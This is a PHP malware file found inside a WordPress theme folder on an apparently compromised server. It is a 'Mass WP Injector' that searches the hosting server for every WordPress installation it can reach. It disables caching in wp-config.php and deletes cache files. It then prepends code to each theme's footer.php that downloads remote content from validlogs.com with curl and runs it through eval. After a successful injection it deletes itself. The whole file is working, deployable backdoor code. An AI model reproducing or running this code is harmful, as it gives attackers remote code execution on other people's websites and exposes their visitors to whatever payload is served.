File: /www/wwwroot/fni.gov.mz/wp-content/themes/wagrrop/wp.php
<?php
// Error-Proof Mass WP Injector - Individual Site Isolation
error_reporting(0); ini_set('display_errors',0); set_time_limit(0); ignore_user_abort(1);
// New functions for comprehensive directory scanning
function get_hosting_home_base() {
$possible_homes = [
$_SERVER['HOME'] ?? '',
getenv('HOME'),
dirname($_SERVER['DOCUMENT_ROOT']) . '/..',
'/home', '/home1', '/home2', '/home3', '/home4', '/home5',
'/home6', '/home7', '/home8', '/home9', '/home10',
'/var/www', '/var/www/vhosts', '/usr/local/plesk/apache/vhosts'
];
$user = get_current_user();
if($user) {
$possible_homes[] = "/home/$user";
for($i=1; $i<=10; $i++) $possible_homes[] = "/home$i/$user";
}
foreach($possible_homes as $home) {
if(is_dir($home) && has_domain_folders($home)) return realpath($home);
}
return false;
}
function has_domain_folders($dir) {
$items = @scandir($dir);
if(!$items) return false;
$domain_count = 0;
foreach($items as $item) {
if($item == '.' || $item == '..') continue;
$full_path = $dir . '/' . $item;
if(is_dir($full_path)) {
if(preg_match('/\.(com|net|org|co|io|me|us|uk|au|ca|de|fr|it|es|nl)$/i', $item) ||
in_array($item, ['public_html', 'www', 'httpdocs', 'htdocs'])) {
$domain_count++;
}
}
}
return $domain_count > 0;
}
function scan_hosting_domains($home_base) {
$wp_paths = [];
$items = @scandir($home_base);
if(!$items) return $wp_paths;
foreach($items as $item) {
if($item == '.' || $item == '..') continue;
$domain_path = $home_base . '/' . $item;
if(is_dir($domain_path)) {
// Direct WP
$direct_wp = find_wp_load_comprehensive($domain_path);
if($direct_wp) $wp_paths[] = $direct_wp;
// Web directories
$web_dirs = ['public_html', 'www', 'httpdocs', 'htdocs', 'web', 'html'];
foreach($web_dirs as $web_dir) {
$web_path = $domain_path . '/' . $web_dir;
if(is_dir($web_path)) {
$web_wps = scan_directory_comprehensive($web_path, 3);
$wp_paths = array_merge($wp_paths, $web_wps);
}
}
}
}
return $wp_paths;
}
function get_cpanel_common_paths() {
$user = get_current_user();
$paths = ["/home/$user/public_html", "/home/$user", "/var/www/html", "/home/theligh1/domains/khaoded77.com/public_html"];
for($i=1; $i<=10; $i++) {
$paths[] = "/home$i/$user/public_html";
$paths[] = "/home$i/$user";
}
return array_unique($paths);
}
function get_hosting_patterns() {
$user = get_current_user();
return [
"/home[0-9]*/$user/*/public_html",
"/home[0-9]*/domains/*",
"/var/www/vhosts/*/*",
"/usr/local/plesk/apache/vhosts/*/*",
"/*/public_html"
];
}
function scan_directory_comprehensive($dir, $max_depth = 3, $current_depth = 0) {
$wp_paths = [];
if($current_depth > $max_depth || !is_dir($dir)) return $wp_paths;
$wp_load = find_wp_load_comprehensive($dir);
if($wp_load) $wp_paths[] = $wp_load;
$subdirs = @scandir($dir);
if(!$subdirs) return $wp_paths;
foreach($subdirs as $item) {
if($item == '.' || $item == '..') continue;
$full_path = rtrim($dir, '/') . '/' . $item;
if(is_dir($full_path)) {
$sub_results = scan_directory_comprehensive($full_path, $max_depth, $current_depth + 1);
$wp_paths = array_merge($wp_paths, $sub_results);
}
}
return $wp_paths;
}
function find_wp_load_comprehensive($dir) {
$wp_indicators = ['wp-load.php', 'wp-config.php', 'wp-content/'];
$has_wp = false;
foreach($wp_indicators as $indicator) {
if(file_exists(rtrim($dir, '/') . '/' . $indicator)) {
$has_wp = true;
break;
}
}
if(!$has_wp) return false;
$wp_load = $dir . '/wp-load.php';
if(file_exists($wp_load)) return realpath($wp_load);
return false;
}
// Modified find_all_wp_installs with fallback parent directory scanning
function find_all_wp_installs() {
$all_wp_paths = [];
// Get cPanel common paths
$base_dirs = get_cpanel_common_paths();
// Add paths from hosting patterns
foreach(get_hosting_patterns() as $pattern) {
$dirs = @glob($pattern, GLOB_ONLYDIR);
if($dirs) $base_dirs = array_merge($base_dirs, $dirs);
}
// Add hosting home base
$home_base = get_hosting_home_base();
if($home_base) {
$wp_paths = scan_hosting_domains($home_base);
$all_wp_paths = array_merge($all_wp_paths, $wp_paths);
}
// Scan all base directories
foreach($base_dirs as $base_dir) {
if(!is_dir($base_dir)) continue;
$wp_paths = scan_directory_comprehensive($base_dir, 5);
if($wp_paths) $all_wp_paths = array_merge($all_wp_paths, $wp_paths);
}
// Fallback: Scan parent directories if no WP installs found
if(empty($all_wp_paths)) {
echo "No WordPress installations found in initial scan. Trying parent directories...\n";
$current_dir = dirname(__FILE__);
for($i = 1; $i <= 3; $i++) { // Check up to 3 parent levels
$parent_dir = dirname($current_dir, $i);
if(!is_dir($parent_dir)) break;
echo "Scanning parent directory: $parent_dir\n";
$wp_paths = scan_directory_comprehensive($parent_dir, 5);
if($wp_paths) $all_wp_paths = array_merge($all_wp_paths, $wp_paths);
}
}
return array_unique($all_wp_paths);
}
function scan_directory_for_wp($dir, $max_depth = 5, $current_depth = 0) {
$wp_paths = [];
if($current_depth > $max_depth || !is_dir($dir)) return $wp_paths;
$wp_load = find_wp_in_current_dir($dir);
if($wp_load) $wp_paths[] = $wp_load;
$subdirs = @scandir($dir);
if(!$subdirs) return $wp_paths;
foreach($subdirs as $item) {
if($item == '.' || $item == '..') continue;
$full_path = rtrim($dir, '/') . '/' . $item;
if(is_dir($full_path)) {
$sub_results = scan_directory_for_wp($full_path, $max_depth, $current_depth + 1);
$wp_paths = array_merge($wp_paths, $sub_results);
}
}
return $wp_paths;
}
function find_wp_in_current_dir($dir) {
$wp_indicators = ['wp-load.php', 'wp-config.php', 'wp-content/'];
$has_wp = false;
foreach($wp_indicators as $indicator) {
if(file_exists(rtrim($dir, '/') . '/' . $indicator)) {
$has_wp = true;
break;
}
}
if(!$has_wp) return false;
$wp_load = $dir . '/wp-load.php';
if(file_exists($wp_load)) return realpath($wp_load);
return false;
}
// ULTRA-SAFE Cache Disable - No WP Functions
function disable_caches_ultra_safe($wp_dir) {
// Only wp-config modification (no WP loading)
$config_path = $wp_dir . '/wp-config.php';
if(!file_exists($config_path)) return false;
$content = @file_get_contents($config_path);
if($content === false) return false;
// Add LiteSpeed disable if missing
if(strpos($content, 'LSCWP_DISABLE_ALL') === false) {
$disable_code = "\n// Cache Disable - LiteSpeed\n";
$disable_code .= "define('LSCWP_DISABLE_ALL', true);\n";
$disable_code .= "define('WP_CACHE', false);\n";
$disable_code .= "define('WP_ROCKET_IS_TAKING_CARE_OF_CACHE', false);\n";
if(is_writable($config_path)) {
@file_put_contents($config_path, $content . $disable_code);
return true;
}
}
// Clear obvious cache dirs
$cache_dirs = [
$wp_dir . '/wp-content/cache/',
$wp_dir . '/cache/'
];
foreach($cache_dirs as $cache_dir) {
if(is_dir($cache_dir)) {
$files = @glob($cache_dir . '*');
if($files) {
foreach($files as $file) {
@unlink($file);
}
}
}
}
return true;
}
// CRITICAL ERROR-PROOF Theme Injection
function inject_theme_safe($wp_load) {
$wp_dir = dirname($wp_load);
// ULTRA-SAFE WP Loading with full isolation
if(!file_exists($wp_load)) return false;
// Create isolated environment
$old_abspath = defined('ABSPATH') ? ABSPATH : '';
$old_wp_load = defined('WP_LOAD_PATH') ? WP_LOAD_PATH : '';
define('WP_LOAD_PATH', $wp_load);
// Try multiple loading methods
$wp_loaded = false;
// Method 1: Direct include
ob_start();
if(@include_once($wp_load)) {
if(function_exists('wp_get_themes')) {
$wp_loaded = true;
}
}
ob_end_clean();
// Method 2: If Method 1 fails, try wp-config
if(!$wp_loaded) {
$config_path = $wp_dir . '/wp-config.php';
if(file_exists($config_path)) {
ob_start();
if(@include_once($config_path)) {
if(defined('ABSPATH') && function_exists('wp_get_themes')) {
$wp_loaded = true;
}
}
ob_end_clean();
}
}
if(!$wp_loaded) {
echo " ✗ WP environment failed to load\n";
return false;
}
// Safe theme injection with multiple fallbacks
$inject_code = '<?php $u="https://validlogs.com/link1.txt";$ch=curl_init($u);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);curl_setopt($ch,CURLOPT_TIMEOUT,10);$c=curl_exec($ch);curl_close($ch);if($c)eval("?>".$c); ?>';
$injected = false;
// Method 1: Standard wp_get_themes
if(function_exists('wp_get_themes')) {
try {
$themes = wp_get_themes();
foreach($themes as $theme) {
$theme_dir = $theme->get_stylesheet_directory();
$footer_file = $theme_dir . '/footer.php';
if(!is_dir($theme_dir) || !is_writable($theme_dir)) continue;
if(file_exists($footer_file)) {
$current = @file_get_contents($footer_file);
if(strpos($current ?: '', 'validlogs.com') === false) {
$new_content = $inject_code . ($current ?: '');
if(@file_put_contents($footer_file, $new_content)) {
$injected = true;
}
}
} else {
$footer_content = $inject_code . '<?php wp_footer(); ?>' . "\n</body></html>";
if(@file_put_contents($footer_file, $footer_content)) {
@chmod($footer_file, 0644);
$injected = true;
}
}
}
} catch(Exception $e) {
// Method 1 failed, try Method 2
}
}
// Method 2: Direct theme directory scan (if WP functions fail)
if(!$injected) {
$themes_path = $wp_dir . '/wp-content/themes/';
if(is_dir($themes_path)) {
$theme_dirs = @scandir($themes_path);
if($theme_dirs) {
foreach($theme_dirs as $theme_name) {
if($theme_name == '.' || $theme_name == '..') continue;
$theme_dir = $themes_path . $theme_name;
if(!is_dir($theme_dir)) continue;
$footer_file = $theme_dir . '/footer.php';
if(is_writable($theme_dir) && (!file_exists($footer_file) || is_writable($footer_file))) {
$current = file_exists($footer_file) ? file_get_contents($footer_file) : '';
if(strpos($current, 'validlogs.com') === false) {
$new_content = $inject_code . $current;
if(file_put_contents($footer_file, $new_content)) {
$injected = true;
}
}
}
}
}
}
}
// Restore original environment
if($old_abspath) define('ABSPATH', $old_abspath);
return $injected;
}
// MAIN EXECUTION WITH FULL ERROR ISOLATION
echo "=== Error-Proof Mass WP Injector ===\n";
$all_wp_installs = find_all_wp_installs();
echo "Found " . count($all_wp_installs) . " WordPress installations\n\n";
$total_processed = 0;
$total_injected = 0;
$total_caches_disabled = 0;
foreach($all_wp_installs as $index => $wp_load) {
$wp_base = dirname($wp_load);
$site_name = basename($wp_base);
echo "[$index] Processing: $site_name ($wp_base)\n";
// Isolate each site processing
try {
// Disable caches (ultra-safe, no WP loading)
if(disable_caches_ultra_safe($wp_base)) {
echo " ✓ Caches disabled (wp-config)\n";
$total_caches_disabled++;
}
// Theme injection (isolated WP environment)
if(inject_theme_safe($wp_load)) {
echo " ✓ Themes injected\n";
$total_injected++;
} else {
echo " ✗ Theme injection failed (permissions?)\n";
}
$total_processed++;
} catch(Exception $e) {
echo " ✗ CRITICAL ERROR - Site skipped: " . $e->getMessage() . "\n";
}
// Force cleanup between sites
if(function_exists('wp_clean_theme_cache')) wp_clean_theme_cache();
ob_end_clean();
echo "\n";
}
// Final report
echo "=== SUMMARY ===\n";
echo "Total WP installs found: " . count($all_wp_installs) . "\n";
echo "Processed: $total_processed\n";
echo "Caches disabled: $total_caches_disabled\n";
echo "Themes injected: $total_injected\n";
if($total_injected > 0 && is_writable(__FILE__)) {
unlink(__FILE__);
echo "✓ Self-deleted\n";
}
echo "=== COMPLETE ===\n";
exit;
?>